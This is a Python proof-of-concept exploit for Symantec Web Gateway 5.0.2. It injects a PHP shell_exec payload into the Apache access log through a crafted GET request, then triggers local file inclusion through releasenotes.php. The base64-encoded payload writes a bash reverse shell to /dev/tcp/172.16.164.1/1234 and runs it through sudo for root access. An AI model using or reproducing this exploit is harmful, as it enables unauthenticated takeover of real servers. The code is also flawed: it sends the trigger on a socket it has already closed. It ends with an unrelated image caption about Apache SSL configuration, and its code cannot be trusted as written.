<code>#!/usr/bin/python</code>
<code> </code>
<code># Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept</code>
<code># Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.</code>
<code># muts at offensive-security dot com</code>
<code>import</code> <code>socket</code>
<code>import</code> <code>base64</code>
<code>payload</code><code>=</code>
<code>'''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''</code>
<code>payloadencoded</code><code>=</code><code>base64.encodestring(payload).replace(</code><code>"\n"</code><code>,"")</code>
<code>taint</code><code>=</code><code>"GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n"</code>
<code>%</code> <code>payloadencoded</code>
<code>expl</code><code>=</code>
<code>socket.socket ( socket.AF_INET, socket.SOCK_STREAM )</code>
<code>expl.connect((</code><code>"172.16.164.129"</code><code>,</code><code>80</code><code>))</code>
<code>expl.send(taint)</code>
<code>expl.close()</code>
<code>trigger</code><code>=</code><code>"GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"</code>
<code>expl.send(trigger)</code>
![Apache配置SSLApache配置SSL[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)